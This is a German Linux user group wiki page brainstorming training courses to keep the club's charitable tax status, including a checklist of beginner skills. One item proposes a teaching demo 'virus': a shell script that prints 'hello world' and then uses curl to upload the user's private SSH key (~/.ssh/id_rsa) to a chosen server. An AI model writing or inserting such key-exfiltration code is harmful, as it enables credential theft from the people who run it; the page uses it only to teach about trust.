Anforderung Finanzamt

Aus lugvswiki
Wechseln zu: Navigation, Suche

Anfrage des FA

Die L4A Sammlungen fallen dem FinanzAmt (FA) wohl zu wenig ins Gewicht. Bezüglich unserer Satzung steht in §2 Seite 1, dass wir "Schulungen" durch führen. Um den Status der Gemeinnützigkeit erhalten zu können müssen wir da mehr tun.

Diskussion mögliche Schulungen

Linux Einsteiger Kurse

Einsteiger Kurse (Seminar und Workshops) z.B. bei der VHS wurden nach Initiative von Herrn Dr. Awe der VHS-Donaueschingen mit guten bis sehr guten Erfolg gehalten. Ein kurzer Bericht findet sich hier.


Ideensammlung Schulungen

Idee bei Reparaturkaffees in Donau mitmachen


Ideen Schulungen:

Studenten Fehlerrechnung mit Python Libraries      Ansonsten halte ich als jmd. aus der Medienpädagogik viel von Workshops etc. an Schulen, nur die Frage des Themas, d.h.

  • Konsole weniger,
  • Überwachung/soziale Netzwerke/TOR mehr...         

my2cent Bernd

OSS für Win / Mac / Lin:


Eine Art  Kompetenzausweis (Absprechen mit anderen LUG Vereinen?). Noch nicht fertig durchdachte Liste:

  • einmal Ubuntu installiern
  • einmal Terminal benutzen
  • einmal Lizenztexte von GPL, BSD, WTFPL (weil man sie sich merken kann!) - creative commons durchlesen und im Grunde verstehen
  • Was bedeutet Freiheit? (Ich darf mein Programm ändern und weitergeben wie Ich will ...)
  • Sinn / Unsinn Vor-und Nachteile von Patenten kurz erläutern
  • einmal ein "Hello world" programm schreiben (beliebige Sprache)
  • man/info aufrufen
  • irc chat benutzen
  • pidgin mit welchem Videochatprotokoll auch immer installieren und einrichten
  • Einmal Foto mit Gimp bearbeiten (Auflösung, schärfen, Farbe, Raw Bild, ..)
  • libreoffice nutzen
  • Ein Backup Programm kennenlernen (Ubuntu hat ein einfaches)
  • Welche Macht hat Google?
    • Inhalt 1: Ist Schokolade gut ? => ja / Ist Schokolade schlecht  ?=> ja / zu lernen: Google antwortet immer, bitte selber Gehirn einschalten
    • Inhalt zwei: Du siehst alles durch Google Brille, es gibt mehr, was du aber nicht siehst
    • Inhalt drei: Google & Microsoft sind fast überall vertreten, durch Sicherheitslücken in Browsern oder Skype Nutzung hat USA theoretisch die Macht mit fast jedem PC zu tun, was sie wollen (?) Ja, das ist eine Unterstellung
    • Doppelklick Mac vs Windows => Patentstreitigkeiten als Ursache
    • ...
  • 2ter Weltkrieg? Gabs nie. Unsere Geschichte ist Wikipedia :-)
  • Einen einfachen Virus schreiben (App die "hello world sagt", aber noch weiter Dinge tut) => Nachweis, warum "Open Source"  alleine vertrauenswürdig sein kann.
 #!/bin/sh
 echo "hello world"
 curl <paar argumente zum upload von ~/.ssh/id_rsa zu server deiner Wahl>
 

Und mit den Virenscannern scannen ? :-)

  • Denksportaufgabe (Gehirnjogging): Wenn Sagrotan® 99,9 % von 4

Bakterienstämme vernichtet, welchen Effekt hat das Mittel dann, wenn man nachts 12h schläft - wenn man annimmt, dass Bakterien sich alle 30min teilen?

Na ja, nach 10 Teilungsvorgängen ist die Dezimierung wieder aufgeholt, das entspricht 5h ... das heisst um einen Effekt zu haben müsste man alle < 5h putzen - auch nachts :-) .. Ja, bei Gehirn einschalten fängt der Spass erst an *lol* - und das ist ja auch ein Teil der "Open Source" Community, oder?

Sinn und Zweck von solchen Überlegungen ist es die Interessenten anzuregen, und alles gelernte auf ihren Alltag zu übertragen (Transfer)